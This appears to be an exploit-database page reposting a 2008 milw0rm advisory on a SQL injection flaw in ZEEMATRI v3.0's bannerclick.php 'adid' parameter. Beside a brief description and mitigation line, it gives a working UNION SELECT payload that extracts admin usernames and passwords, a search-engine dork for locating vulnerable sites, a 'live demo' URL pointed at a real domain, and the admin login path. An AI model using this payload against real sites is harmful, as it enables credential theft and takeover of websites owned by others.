header-logo
Suggest Exploit
vendor:
zeematri
by:
Hussin X
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: zeematri
Affected Version From: 3
Affected Version To: 3
Patch Exists: YES
Related CWE: N/A
CPE: a:zeeways:zeematri
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ZEEMATRI v3.0 (bannerclick.php adid) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in ZEEMATRI v3.0. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable script bannerclick.php with the parameter adid, which will execute the malicious SQL statements in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

|___________________________________________________|
|
| ZEEMATRI v3.0 (bannerclick.php adid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home : www.IQ-TY.com & www.TrYaG.cc
|
|    email: darkangeL_G85@Yahoo.COM
|
|
|___________________________________________________
|                                                   |
|
| script: http://zeeways.com/php-software/zeematri-v3.0.html
|
| Dork: "Powered by ZeeMatri"
|
|___________________________________________________|

Exploit:
________



www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--




L!VE DEMO:
_________


http://zeematri.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--





___________________


Admin  LogiN :

www.[target].com/Script/admin/

# milw0rm.com [2008-11-09]